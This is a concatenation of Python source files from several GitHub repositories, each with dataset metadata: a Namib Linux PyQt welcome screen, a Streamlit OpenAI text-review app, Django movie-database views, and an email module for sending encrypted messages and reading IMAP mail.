icon7.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/news.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.newsButton.setIcon(icon7)
self.newsButton.setObjectName("newsButton")
######################### NEWS BUTTON ##########################
self.newsButton.clicked.connect(self.newsButtonAction)
################################################################
self.mainGrid.addWidget(self.newsButton, 6, 0, 1, 1)
self.infoLabel = QtWidgets.QLabel(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.infoLabel.sizePolicy().hasHeightForWidth())
self.infoLabel.setSizePolicy(sizePolicy)
self.infoLabel.setScaledContents(True)
self.infoLabel.setWordWrap(True)
self.infoLabel.setObjectName("infoLabel")
self.mainGrid.addWidget(self.infoLabel, 2, 0, 1, 3)
self.gridLayout.addLayout(self.mainGrid, 0, 0, 1, 1)
WelcomeScreen.setCentralWidget(self.MainWidget)
self.retranslateUi(WelcomeScreen)
self.languageSelector.setCurrentIndex(12)
QtCore.QMetaObject.connectSlotsByName(WelcomeScreen)
######################### LIVEUSER ? ##########################
if os.path.isfile("/usr/bin/calamares_polkit"):
self.installButton.setVisible(True)
self.installationLabel.setVisible(True)
###############################################################
######################### IS AUTOSTART ? ######################
homedir = os.path.expanduser('~')
autostartfile = os.path.join(homedir, ".config/autostart/namib-welcome.desktop")
if os.path.isfile(autostartfile):
self.launchAtStartCheck.setChecked(True)
###############################################################
def retranslateUi(self, WelcomeScreen):
_translate = QtCore.QCoreApplication.translate
WelcomeScreen.setWindowTitle(_translate("WelcomeScreen", "Welcome Screen"))
self.wikiButton.setText(_translate("WelcomeScreen", "Wiki"))
self.linksLabel.setText(_translate("WelcomeScreen", "<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">LINKS :</span></p></body></html>"))
self.donateButton.setText(_translate("WelcomeScreen", "Donate"))
self.chatButton.setText(_translate("WelcomeScreen", "Chat room"))
self.installationLabel.setText(_translate("WelcomeScreen", "<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">INSTALLATION :</span></p></body></html>"))
self.installButton.setText(_translate("WelcomeScreen", "Install Now"))
self.welcomeLabel.setText(_translate("WelcomeScreen", "<html><head/><body><p align=\"center\"><span style=\" font-size:18pt; font-weight:600;\">Welcome to Namib GNU/Linux !</span></p></body></html>"))
self.forumsButton.setText(_translate("WelcomeScreen", "Forums"))
self.languageSelector.setCurrentText(_translate("WelcomeScreen", "English"))
self.languageSelector.setItemText(0, _translate("WelcomeScreen", "Albanian"))
self.languageSelector.setItemText(1, _translate("WelcomeScreen", "Arabic"))
self.languageSelector.setItemText(2, _translate("WelcomeScreen", "Asturian (Spain)"))
self.languageSelector.setItemText(3, _translate("WelcomeScreen", "Belarusian"))
self.languageSelector.setItemText(4, _translate("WelcomeScreen", "Bulgarian"))
self.languageSelector.setItemText(5, _translate("WelcomeScreen", "Catalan"))
self.languageSelector.setItemText(6, _translate("WelcomeScreen", "Chinese (China)"))
self.languageSelector.setItemText(7, _translate("WelcomeScreen", "Chinese (Taiwan)"))
self.languageSelector.setItemText(8, _translate("WelcomeScreen", "Croatian"))
self.languageSelector.setItemText(9, _translate("WelcomeScreen", "Czech"))
self.languageSelector.setItemText(10, _translate("WelcomeScreen", "Danish"))
self.languageSelector.setItemText(11, _translate("WelcomeScreen", "Dutch"))
self.languageSelector.setItemText(12, _translate("WelcomeScreen", "English"))
self.languageSelector.setItemText(13, _translate("WelcomeScreen", "French"))
self.languageSelector.setItemText(14, _translate("WelcomeScreen", "German"))
self.languageSelector.setItemText(15, _translate("WelcomeScreen", "Georgian"))
self.languageSelector.setItemText(16, _translate("WelcomeScreen", "Greek (Greece)"))
self.languageSelector.setItemText(17, _translate("WelcomeScreen", "Hebrew"))
self.languageSelector.setItemText(18, _translate("WelcomeScreen", "Hindi (India)"))
self.languageSelector.setItemText(19, _translate("WelcomeScreen", "New Item"))
self.languageSelector.setItemText(20, _translate("WelcomeScreen", "Hungarian"))
self.languageSelector.setItemText(21, _translate("WelcomeScreen", "Icelandic"))
self.languageSelector.setItemText(22, _translate("WelcomeScreen", "Indonesian (Indonesia)"))
self.languageSelector.setItemText(23, _translate("WelcomeScreen", "Italian"))
self.languageSelector.setItemText(24, _translate("WelcomeScreen", "Japanese"))
self.languageSelector.setItemText(25, _translate("WelcomeScreen", "Korean (Korea)"))
self.languageSelector.setItemText(26, _translate("WelcomeScreen", "Lithuanian"))
self.languageSelector.setItemText(27, _translate("WelcomeScreen", "Norwegian Bokmål"))
self.languageSelector.setItemText(28, _translate("WelcomeScreen", "Persian (Iran)"))
self.languageSelector.setItemText(29, _translate("WelcomeScreen", "Polish"))
self.languageSelector.setItemText(30, _translate("WelcomeScreen", "Portuguese (Brazil)"))
self.languageSelector.setItemText(31, _translate("WelcomeScreen", "Portuguese (Portugal)"))
self.languageSelector.setItemText(32, _translate("WelcomeScreen", "Romanian (Romania)"))
self.languageSelector.setItemText(33, _translate("WelcomeScreen", "Russian"))
self.languageSelector.setItemText(34, _translate("WelcomeScreen", "Slovak"))
self.languageSelector.setItemText(35, _translate("WelcomeScreen", "Slovenian (Slovenia)"))
self.languageSelector.setItemText(36, _translate("WelcomeScreen", "Slovenian"))
self.languageSelector.setItemText(37, _translate("WelcomeScreen", "Spanish"))
self.languageSelector.setItemText(38, _translate("WelcomeScreen", "Serbian (Serbia)"))
self.languageSelector.setItemText(39, _translate("WelcomeScreen", "Serbian"))
self.languageSelector.setItemText(40, _translate("WelcomeScreen", "Swedish"))
self.languageSelector.setItemText(41, _translate("WelcomeScreen", "THai"))
self.languageSelector.setItemText(42, _translate("WelcomeScreen", "Turkish (Turkey)"))
self.languageSelector.setItemText(43, _translate("WelcomeScreen", "Turkish"))
self.languageSelector.setItemText(44, _translate("WelcomeScreen", "Ukrainian"))
self.languageSelector.setItemText(45, _translate("WelcomeScreen", "Vietnamese (Viet Nam)"))
self.launchAtStartCheck.setText(_translate("WelcomeScreen", "Launch at start"))
self.helpButton.setText(_translate("WelcomeScreen", "Help us"))
self.newsButton.setText(_translate("WelcomeScreen", "News"))
self.infoLabel.setText(_translate("WelcomeScreen", "<html><head/><body><p align=\"center\">Welcome to Namib GNU/Linux. The links below will help you get started with Namib. So enjoy the experience, and don\'t hesitate to send us your feedback.</p></body></html>"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
WelcomeScreen = QtWidgets.QMainWindow()
ui = Ui_WelcomeScreen()
ui.setupUi(WelcomeScreen)
WelcomeScreen.show()
sys.exit(app.exec_())
| namiblinux/namib-welcome | src/namib-welcome.py | namib-welcome.py | py | 24,467 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "webbrowser.open",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "webbrowser.open",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "webbrowser.open",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "webbrowser.open",
... |
41826551936 | import os
import streamlit as st
import openai
from dotenv import load_dotenv
def load_guidelines(filepath):
with open(filepath, 'r', encoding='utf-8') as f:
return f.read()
def save_guidelines(filepath, content):
with open(filepath, 'w', encoding='utf-8') as f:
f.write(content)
load_dotenv()
api_key = os.getenv("OPENAI_API_KEY")
# print(api_key)
openai.api_key = api_key
def chat_with_model(prompt, guidelines):
messages = [
{"role": "system", "content": guidelines},
{"role": "user", "content": prompt},
{"role": "assistant", "content": ""}
]
response = openai.ChatCompletion.create(
model="gpt-4",
max_tokens=1536,
messages=messages,
temperature=0,
stream=True
)
return response['choices'][0]['message']['content']
# Load Guidelines from a file
guidelines_path = "system.txt" # Replace with your file path
guidelines = load_guidelines(guidelines_path)
# Streamlit App
st.title("OpenAI Chat Assistant for Text Improvement")
with st.expander("Guidelines ein-/ausblenden"):
guidelines = st.text_area("Content Guidelines:", guidelines)
if st.button("Speichern"):
save_guidelines(guidelines_path, guidelines)
# st.write("Bitte geben Sie Ihr Textbeispiel ein.")
user_input = st.text_area("Bitte geben Sie Ihr Textbeispiel ein.")
if user_input:
assistant_reply = chat_with_model(user_input, guidelines)
st.write(f"Assistant: {assistant_reply}")
| fhoeg/textReview_gui | app.py | app.py | py | 1,490 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "openai.api_key",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "openai.ChatCompletio... |
73268729635 | from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect,JsonResponse
from .forms import NameForm
from .models import NameFormModel
import json, os, requests
from datetime import datetime
# Create your views here.
database = []
def moviemanagerView(request):
if request.method == 'POST':
form = NameForm(request.POST)
#year_model = Year(request.POST)
if form.is_valid():
#Not initializing db here, instead storing cleaned data for manipulation
cleanForm = form.cleaned_data
print(cleanForm)
print(type(cleanForm))
#obj = NameFormModel.objects.create(**form.cleaned_data)
movies_json = JsonResponse(cleanForm, safe = False)
#Always have to futz with dates for one reason or another. This prevents the db from having datetime() instead of your actual date.
cleanForm["date_watched_field"] = cleanForm["date_watched_field"].strftime("%m/%d/%Y")
#Check to see if your db already exists, if it doesn't you need to do some more work. If it does you can just continue
if os.path.exists('moviedatabase.json'):
with open('moviedatabase.json') as outfile:
data = json.load(outfile)
if not os.path.exists('moviedatabase.json'):
data = []
data.append(cleanForm)
with open('moviedatabase.json','w') as outfile:
json.dump(data,outfile)
# This is just to show a response to the user. You can render another form here instead of the default form. This is your chance to return a templated list instead but this should get you on the right road.
return HttpResponse(str(data))
#return render (request, 'form.html',{'form':form})
else:
form = NameForm()
return render (request, 'form.html',{'form':form})
def moviemanager(request):
if request.method == 'POST':
form = NameForm(request.POST)
if form.is_valid():
form = NameForm()
#return redirect('home:home')
return render (request, 'form.html',{'form':form})
else:
form = NameForm()
return render (request, 'form.html',{'form':form})
def about_page(request):
page_tile = "About title"
return render(request, "about.html",{"title":page_tile})
def contact_page(request):
contact_title = "Contact title"
return render(request, "contact.html",{"title":contact_title})
| Leeoku/MovieDatabase | moviedb_project/moviemanager/views.py | views.py | py | 2,560 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "forms.NameForm",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.http.JsonResponse",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
... |
23637603147 |
import ssl
import smtplib
import imaplib
from email import encoders
import email
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.image import MIMEImage
from email.mime.base import MIMEBase
import time
import datetime
import traceback
import mylibs.ioprocessing as iop
import re
import os
import socket
socket.setdefaulttimeout(15)
def get_new_to_addr_list(my_addr,msgobj):
# print(msgobj)
cur_to=[]
if 'to' in msgobj:
if msgobj['to']!='':
cur_to=msgobj['to']
# print('to',cur_to)
elif 'To' in msgobj:
if msgobj['To']!='':
cur_to=msgobj['To'].split(',')
# print('To',cur_to)
cur_from=''
if 'from' in msgobj:
cur_to.append(msgobj['from'])
elif 'From' in msgobj:
cur_to.append(msgobj['From']) #.split(',')
# print(cur_to)
try:
cur_to.remove(my_addr)
except:
print()
cur_to.append(cur_from)
return cur_to
def send_input(json_obj , pp, send_file=False, send_public=False, msg_receiver_s='',subj='',sent_msg_cont=''):
# get aliases:
only_return_book=False
if msg_receiver_s!='' or subj!='':
only_return_book=True
addr_alia=iop.print_addr_book(json_obj,only_return_book)
# 1. prompt for subject / or default
# subj='' #iop.input_prompt(propmtstr='\n Enter message subject: ', confirm=True, soft_quite=True)
# 2. prompt for receiver / check key or pass exist ...
if msg_receiver_s=='':
msg_receiver_s=iop.input_prompt(propmtstr='\n Enter receiver address or alias - multiple after comas: ', confirm=False, soft_quite=True)
if msg_receiver_s=='q' or msg_receiver_s=='':
print('Quitting message...')
return '', '', '', ''
# msg_receiver_s=msg_receiver_s.split(',')
msg_receivers_list=msg_receiver_s #[] #msg_receiver.strip().lower()
# for msg_receiver in msg_receiver_s:
# if msg_receiver in addr_alia.keys():
# msg_receivers_list.append(msg_receiver.strip())
# elif '@' in msg_receiver and send_public:
# msg_receivers_list.append(msg_receiver.strip())
# else : # if not full mail try match alias
# print('Extracting alias address...')
# tmp=0
# for kk in addr_alia.keys():
# if addr_alia[kk]==msg_receiver:
# tmp=1
# print('Matched alias '+msg_receiver+' to '+kk)
# msg_receivers_list.append(kk)
# break
print(msg_receivers_list)
if len(msg_receivers_list)==0:
print('...no proper address found - quitting message!...')
return '', '', '', ''
else:
print('Sending to '+str(msg_receivers_list))
same_keys=True
keytype=[]
key=[]
if send_public==False:
pubkeys=iop.gpg_uids()
# "outgoing_encryption_type","outgoing_encryption_key"
for ijk, msg_receiver in enumerate(msg_receivers_list):
if json_obj["outgoing_encryption_type"]=='pgp':
if json_obj["outgoing_encryption_key"] in str(pubkeys):
keytype.append('pgp')
key.append(json_obj["outgoing_encryption_key"])
else:
print('Wrong key '+json_obj["outgoing_encryption_key"]+' for address '+msg_receiver)
print('Available keys: '+str(pubkeys))
return '', '', '', ''
elif json_obj["outgoing_encryption_type"]=='aes256': #msg_receiver in json_obj["address_book"].keys():
keytype.append('aes256')
key.append(json_obj["outgoing_encryption_key"])
else:
print('Address '+msg_receiver+' missing key or password! First add the address to address book using command saveaddr and set proper password for message encryption and decryption.')
return '', '', '', ''
if same_keys and ijk>0:
if keytype[ijk]!=keytype[ijk-1] or key[ijk]!=key[ijk-1]:
same_keys=False
print('[!] Provided addresses have different keys/passwords - will send multiple messages if you continue...')
msg_content=''
if send_public:
subj=iop.input_prompt(propmtstr='\n Enter message subject: ', confirm=True, soft_quite=True) # if empty - quit sending ...
if send_file:
msg_content=iop.select_file(tmppath='my_files')
elif sent_msg_cont!='':
msg_content=sent_msg_cont
else:
# 3. prompt for content -> save to attachment
msg_content=iop.input_prompt(propmtstr='\n Enter message text/content: ', confirm=True, soft_quite=True) # if empty - quit sending ...
if msg_content in ['','q']:
if msg_content=='':
print('Quitting message - empty content...')
else:
print('Quitting message.')
return '', '', '', ''
str_new_id_send=str(0)
new_id_send=0
try:
new_id_send=int(json_obj["send_internal_id"]) +1
str_new_id_send=str( new_id_send )
except:
print()
ret_list=[]
if send_public:
fname='' #os.path.join('archive','sent','sent_'+str_new_id_send+'.txt')
if send_file:
fname=msg_content
# else:
# iop.save_file(fname,msg_content )
ret_list.append([fname, subj, msg_receivers_list, msg_content])
elif same_keys:
ret_list.append([iop.encr_msg(msg_content,keytype[0],key[0],internal_id_str=str_new_id_send), subj, msg_receivers_list, str_new_id_send])
else:
print('msg_content',msg_content)
for ijk in range(len(keytype)):
ret_list.append([iop.encr_msg(msg_content,keytype[ijk],key[ijk],internal_id_str=str_new_id_send), subj, msg_receivers_list[ijk], str_new_id_send])
new_id_send+=1
str_new_id_send=str( new_id_send )
json_obj["send_internal_id"]=str_new_id_send
# iop.saving_encr_cred( json.dumps(json_obj), newest_file, pp)
return ret_list
def prepare_message_email(sender_name, file_attach=[] , subj='', text_part=''):
def_subject='Lorem ipsum ut gravida'
if subj=='':
subj=def_subject
def_content='GDPR protected customer data update.'
if text_part=='':
text_part=def_content
message = MIMEMultipart("alternative") #html
message.set_charset('utf8')
message["Subject"] = subj
message["From"] = sender_name
msgText = MIMEText(text_part, 'plain')
message.attach(msgText)
att_added=0
if len(file_attach)>0:
for file in file_attach:
cas=check_att_size(file)
if len(cas)>20:
print(cas)
continue
h_head,t_tail=os.path.split(file)
part_file = MIMEBase('application', 'octet-stream') #MIMEBase('multipart', 'mixed; name=%s' % t_tail) #MIMEBase('application', 'octet-stream')
part_file.set_payload(open(file, 'rb').read())
encoders.encode_base64(part_file)
part_file.add_header('Content-Disposition', 'attachment; filename="%s"' % t_tail)
message.attach(part_file)
att_added+=1
if att_added==0 and subj==def_subject and text_part==def_content:
return '[!] No attachment - only default content - not sending message... Change message subject or content or add attachment to be able to send.'
return message
def check_att_size(att_file_path,max_bytes=1024*1024*8):
bytes_size = os.path.getsize(att_file_path)
if bytes_size>max_bytes:
return 'Attachment too big. Byte size '+str(bytes_size)+' bigger then max '+str(max_bytes)
else :
return str(bytes_size)
# file attach - place sent files in sent folder in archive - ensure folder exist !
# add method clear attach folder ? clear archive enough
# reply option use the same just enter default email receiver, subject - rest enter manual ...
# def send_email(smpt_cred_dict,receiver_email, file_attach=[] , subj='', text_part=''):
def send_email(smtp_addr,sender_email, password, sender_name, receiver_email, file_attach=[] , subj='', text_part=''):
    """Send an email through SMTP-over-SSL (port 465).

    The body is always prefixed with the GDPR placeholder sentence; the
    message itself is assembled by prepare_message_email.

    Returns:
        'Message sent!' on success, or the error string produced by
        prepare_message_email when the message was refused.
    """
    text_part = 'GDPR protected customer data update. Part '+text_part
    message = prepare_message_email(sender_name, file_attach, subj, text_part)
    # prepare_message_email signals refusal by returning a string;
    # isinstance is the idiomatic check (was: type(message)==type('asdf'))
    if isinstance(message, str):
        return message
    context = ssl.create_default_context()  # secure connection with server
    with smtplib.SMTP_SSL(smtp_addr, 465, timeout=15, context=context) as server:
        server.login(sender_email, password)
        server.send_message(message, sender_email, receiver_email)
        # the "with" block closes the connection; explicit close() removed
    return 'Message sent!'
######
##########
#####################################################3
## IMAP:
def msg_cont_extr_pgp(msg_content):
    """Extract every PGP-armored section found in a raw message body.

    Each returned string is re-wrapped with the BEGIN/END armor lines.
    Returns an empty list when no armor header is present.
    """
    header = '-----BEGIN PGP MESSAGE-----'
    footer = '-----END PGP MESSAGE-----'
    found = []
    if header not in msg_content:
        return found
    for chunk in msg_content.split(header):
        if footer not in chunk:
            continue
        for piece in chunk.split(footer):
            # keep only pieces with real content (more than one
            # non-whitespace character), but store the original text
            if len(iop.clear_whites(piece)) > 1:
                found.append(header + piece + footer)
    return found
# if att>0 allow read att for last message? or per id ?
def download_msg_id_att(mail_from , mail_from_pswd , imap_addr, id,att_name='all',attfolder='tmp'): # check if not already downloaded!
    """Download attachments of one IMAP message into ``attfolder/<id>/``.

    Connects over IMAP4-SSL, fetches message sequence number ``id`` and
    saves attachment parts through ``iop.save_file``. ``att_name`` limits
    the download to a single attachment name; the default ``'all'`` keeps
    every attachment.

    Returns the list of saved file paths on success.
    NOTE(review): on connection/login failure the return value is the tuple
    ``({"Error": traceback}, [])`` while success returns a plain list --
    callers must handle both shapes; confirm before unifying.
    """
    print('\n\nDownloading attachments for message ID=['+str(id)+']:\n')
    mail=None
    try:
        mail = imaplib.IMAP4_SSL(imap_addr)
        mail.login(mail_from,mail_from_pswd)
        mail.select('inbox')
    except:
        # any connection or authentication problem lands here
        err_track = traceback.format_exc()
        return {"Error":err_track}, []
    typ, dd = mail.fetch(str(id), '(RFC822)' ) # '(BODY.PEEK[TEXT])'
    downl=[]
    for response_part in dd:
        if isinstance(response_part, tuple):
            msg = email.message_from_string(response_part[1].decode('utf-8'))
            if msg.is_multipart():
                for part in msg.walk():
                    # attachments are detected via the Content-Disposition header
                    if 'attachment' in str(part.get('Content-Disposition')).lower(): #part.get_content_type() == 'application/octet-stream':
                        fname=part.get_filename()
                        file_name_str=os.path.join(attfolder,id,fname) #os.path.join(attfolder,'id'+id+fname)
                        # skip attachments not matching the requested name
                        if fname!=att_name and att_name.lower()!='all':
                            continue
                        print('Downloading file ['+fname+'] ...')
                        if fname : #and fname.endswith(fileformat):
                            # decode=1 undoes the transfer encoding (base64 etc.)
                            file_content= part.get_payload(decode=1)
                            if iop.save_file(file_name_str,file_content,True):
                                print('... saved to '+file_name_str)
                                downl.append(file_name_str)
                            else:
                                print('Failed to save to '+file_name_str)
                        else:
                            print('Wrong attachmentf file format? ['+fname+']')
    mail.close()
    mail.logout()
    print('Downloaded '+str(downl))
    return downl
# laos detects attachment files to process
def read_msg_id(mail_from , mail_from_pswd , imap_addr, id) :
    """Fetch one IMAP message and split it into its components.

    Returns a dict with keys ``from`` (sender address), ``subj``, ``body``
    (concatenated text/plain parts), ``attachments`` (file names only, not
    downloaded), ``body_html`` and ``to`` (lower-cased recipient addresses).
    NOTE(review): on connection failure the return is the tuple
    ``({"Error": traceback}, [])`` -- a different shape than success.
    """
    mail=None
    try:
        mail = imaplib.IMAP4_SSL(imap_addr)
        mail.login(mail_from,mail_from_pswd)
        mail.select('inbox')
    except:
        err_track = traceback.format_exc()
        return {"Error":err_track}, []
    # print(id,type(id),str(id))
    typ, dd = mail.fetch(str(id), '(RFC822)' ) # '(BODY.PEEK[TEXT])'
    printstr='\n\n Message ID=['+str(id)+'] content:\n'
    msgraw=''
    msghtml=''
    files_att=[]
    sender_email=''
    mail_to=[]
    subj=''
    date=''
    for response_part in dd:
        if isinstance(response_part, tuple):
            msg = email.message_from_string(response_part[1].decode('utf-8'))
            # normalise the Date header to YYYY-MM-DD
            tmpdate=email.utils.parsedate(msg["Date"])
            tmpdate=datetime.datetime.fromtimestamp(time.mktime(tmpdate))
            tmpdate=tmpdate.strftime('%Y-%m-%d')
            subj=msg["Subject"]
            date=tmpdate
            printstr+='Date: '+tmpdate+' From: '+msg["From"]+' Subject: '+msg["Subject"]+'\n'
            sender_email=iop.xtract_email(msg["From"])
            # print(msg)
            # print(msg["To"])
            mail_to=''
            if msg["To"]!=None:
                mail_to=msg["To"].split(',')
            # print(msg["From"],iop.xtract_email(msg["From"]))
            # exit()
            if msg.is_multipart():
                for part in msg.walk():
                    if part.get_content_type()=='text/plain':
                        tmp=str(part.get_payload())
                        msgraw+=tmp
                        printstr+=tmp+'\n'
                    elif part.get_content_type()=='text/html':
                        tmp=str(part.get_payload())
                        msghtml+=tmp
                        printstr+=tmp+'\n'
                    elif 'attachment' in str(part.get('Content-Disposition')).lower():
                        # part.get_content_type() == 'application/octet-stream':
                        files_att.append(part.get_filename())
                        # file_name_datetime_str=file_name.replace(rep_fname,'').replace(rep_fname2,'')
                        # str_file_date=file_name_datetime_str[0:4]+'-'+file_name_datetime_str[4:6]+'-'+file_name_datetime_str[6:8]
            else:
                # non-multipart message: the whole payload is the body
                # print('optsdf')
                printstr+=str(msg.get_payload())+'\n'
    # print(printstr)
    mail.close()
    mail.logout()
    # mail_to may still be '' (no To header) -- iterating '' is a no-op
    for ij,mm in enumerate(mail_to):
        mail_to[ij]=iop.xtract_email(mm).lower()
    # raw_msg={"from":"ktostam", "subj":"jakis", "body":body, "attachments":[attname]}
    return {"from":sender_email, "subj":subj, "body":msgraw, "attachments":files_att, "body_html":msghtml, "to":mail_to}
    # return {"msg_text":msgraw, "msg_html":msghtml, "from":sender_email, "subject":subj, "date":date}, files_att
    # return msg_to_process
# tmpdict={ "Date":tmpdate, "From":msg["From"], "Subject":msg["Subject"], "ID":str(i), "Attachments":att_count, "EmailSize":msg_size} #, "Nr":max_iter
def search_incoming(mail_from , mail_from_pswd , imap_addr, def_opt_init={} ):
    """Search the IMAP inbox and summarise the matching messages.

    Builds an IMAP SEARCH string from ``def_opt_init`` (or from interactive
    prompts when it is empty) with criteria: date_before / date_since /
    from / subject / only_new / last_msg_limit.

    Returns ``(msg_to_process, iilist)`` where ``msg_to_process`` maps a
    countdown index to a summary dict (Date, From, To, Subject, ID,
    Attachments, EmailSize) and ``iilist`` lists those indexes; on
    connection failure returns ``({"Error": traceback}, [])``.
    """
    mail=None
    try:
        mail = imaplib.IMAP4_SSL(imap_addr)
        mail.login(mail_from,mail_from_pswd)
        mail.select('inbox')
    except:
        err_track = traceback.format_exc()
        return {"Error":err_track},[]
    def_opt={'date_before':'any','date_since':'any', 'from':'any', 'subject':'any', 'last_msg_limit':5, 'only_new':'yes'}
    def_opt_set={'date_before':['*','any','all','9912-12-12'], 'date_since':['*','any','all','1912-12-12'], 'from':['*','any','all'], 'subject':['*','all','any']}
    def_opt_usr=def_opt.copy() #{'date_before':'2019-09-01','date_since':'any', 'from':'*', 'subject':'any', 'last_msg_limit':5, 'only_new':'no'} #def_opt
    ## tutaj prompter - user wybier i potwierdza dane ... 6 danych ...
    if def_opt_init!={}:
        # overwrite defaults with any provided init values
        for kk, vv in def_opt_usr.items():
            if kk in def_opt_init:
                def_opt_usr[kk]=def_opt_init[kk] #overwrite with init value
    else: # manual enter values
        # print('\nSet mail search params ... ') #,json_obj[kk])
        for kk in def_opt_usr.keys():
            opt=''
            if kk in def_opt_set.keys():
                opt=' Options: '+str(def_opt_set[kk])
            tmpv=iop.input_prompt('> Enter ['+str(kk)+'] current: ['+str(def_opt_usr[kk])+'] '+opt+' OR end editing [e] : ',False,True)
            tmpv=tmpv.strip()
            if tmpv=='e':
                break
            elif tmpv=='':
                continue
            elif kk=='last_msg_limit':
                try:
                    tmpv=int(tmpv)
                except:
                    # print('Wrong mail search value - should be int number: '+tmpv)
                    continue
            def_opt_usr[kk]=tmpv #propmtstr,confirm=False, soft_quite=False
    # print('Mail search params: ', def_opt_usr)
    # assemble the IMAP SEARCH criteria string from the chosen options
    total_str=''
    if True: #def_opt_usr!=def_opt:
        for kk, vv in def_opt_usr.items():
            if kk=='only_new': #,'only_new':['yes','no','y','n']
                if vv in ['yes','y']:
                    total_str+='(UNSEEN) '
            elif kk=='last_msg_limit': # def_opt_usr['last_msg_limit']
                continue
            elif vv not in def_opt_set[kk]: # if not default option:
                if vv in ['*','any','all']:
                    continue
                if kk=='date_since':
                    # IMAP wants DD-Mon-YYYY dates
                    tmpdate=datetime.datetime.strptime(vv,'%Y-%m-%d')
                    tmpdate=tmpdate.strftime("%d-%b-%Y")
                    total_str+='(SENTSINCE {0})'.format(tmpdate)+' '
                elif kk=='date_before':
                    tmpdate=datetime.datetime.strptime(vv,'%Y-%m-%d')
                    tmpdate=tmpdate.strftime("%d-%b-%Y")
                    total_str+='(SENTBEFORE {0})'.format(tmpdate)+' '
                elif kk=='from':
                    total_str+='(FROM {0})'.format(vv.strip())+' '
                elif kk=='subject':
                    total_str+='(SUBJECT "{0}")'.format(vv.strip())+' '
                # elif kk=='last_msg_limit':
                #     if vv>1
    total_str=total_str.strip()
    if total_str=='':
        total_str='ALL'
    # now seelect top N msg ...
    # print('Search string: ['+total_str+']')
    ttype, data = mail.search(None, total_str ) #'(SENTSINCE {0})'.format(date), '(FROM {0})'.format(sender_email.strip())
    if ttype !='OK':
        mail.close()
        mail.logout()
        return {},[] #'no msg found'
    mail_ids = data[0]
    id_list = mail_ids.split()
    inter_indxi=[int(x) for x in id_list]
    # inter_indxi.sort(reverse = True)
    inter_indxi.sort( )
    msg_to_process={}
    # def_opt_usr['last_msg_limit']
    max_iter=def_opt_usr['last_msg_limit']
    if max_iter<1 or max_iter>len(inter_indxi) or max_iter>999:
        max_iter=min(999,len(inter_indxi))
        # print('Search [last_msg_limit]<1, setting max '+str(max_iter)+' messages')
        # max_iter=999
    # in here only return indexes for decryption!
    # print('... processing messages ... count ',str(len(inter_indxi)))
    iilist=[]
    for i in inter_indxi: #[25]
        if max_iter<1:
            break
        # first fetch body structure to count attachments! and email size
        typ, dd = mail.fetch(str(i), 'BODYSTRUCTURE' )
        att_count=0
        msg_size=0
        if len(dd)>0: #count att:
            # count "ATTACHMENT" markers in the body structure reply
            # print('\n***'+str(email.message_from_bytes(dd[0] ))+'***\n')
            bstr=str(email.message_from_bytes(dd[0] )) #.lower()
            tmpstr=bstr.split("\"ATTACHMENT\"") #'attachment')
            att_count+=len(tmpstr)-1
            # print('att_count',att_count)
            # exit()
        typ, dd = mail.fetch(str(i), '(RFC822.SIZE)' )
        tmps=str(email.message_from_bytes(dd[0] ))
        tmps=tmps.replace('(','').replace(')','')
        tmps=tmps.split()
        if len(tmps)>2:
            if 'RFC822.SIZE' in tmps[1]:
                # print('size?',tmps[2])
                msg_size=tmps[2]
                if iop.is_int(msg_size):
                    msg_size= str( round(float(msg_size)/1024/1024,1) )+' MB'
        typ, dd = mail.fetch(str(i), '(BODY.PEEK[] FLAGS)' ) # FIRST READ FLAGS TO RESTORE THEM !
        for response_part in dd:
            if isinstance(response_part, tuple):
                msg = email.message_from_string(response_part[1].decode('utf-8'))
                mail_to=''
                if msg["To"]!=None:
                    mail_to=msg["To"] #.split(',')
                # print(msg["Date"]+'|'+msg["From"]+'|'+msg["Subject"])
                tmpdate=email.utils.parsedate(msg["Date"])
                tmpdate=datetime.datetime.fromtimestamp(time.mktime(tmpdate))
                tmpdate=tmpdate.strftime('%Y-%m-%d')
                iilist.append(max_iter)
                tmpdict={ "Date":tmpdate, "From":msg["From"],"To":mail_to , "Subject":msg["Subject"], "ID":str(i), "Attachments":att_count, "EmailSize":msg_size}
                msg_to_process[max_iter]=tmpdict #.append(tmpdict)
                max_iter-=1
    mail.close()
    mail.logout()
    return msg_to_process,iilist
def is_imap_conn_bad( mail_from, mail_from_pswd, imap_addr):
    """Return True when the IMAP server/credentials are unusable, False when OK.

    Performs a full login / select / logout cycle over IMAP4-SSL.
    """
    print('\nVerifying IMAP credentials...')  # typo fix (was "Veryfing")
    try:
        with imaplib.IMAP4_SSL(imap_addr) as mail:
            mail.login(mail_from, mail_from_pswd)
            mail.select('inbox')
            mail.close()
            mail.logout()
            return False  # OK
    # narrowed from a bare except so KeyboardInterrupt still propagates
    except Exception:
        return True
def is_smtp_conn_bad(smtp_addr,sender_email,password):
    """Return True when the SMTP server/credentials are unusable, False when OK.

    Bug fix: the original created the SMTP_SSL connection *outside* the
    try block, so an unreachable/bad server address raised an exception
    instead of returning True. The connection is now inside the try.
    """
    print('\nVerifying SMTP credentials...')  # typo fix (was "Veryfing")
    context = ssl.create_default_context()
    try:
        with smtplib.SMTP_SSL(smtp_addr, 465, context=context) as server:
            server.login(sender_email, password)
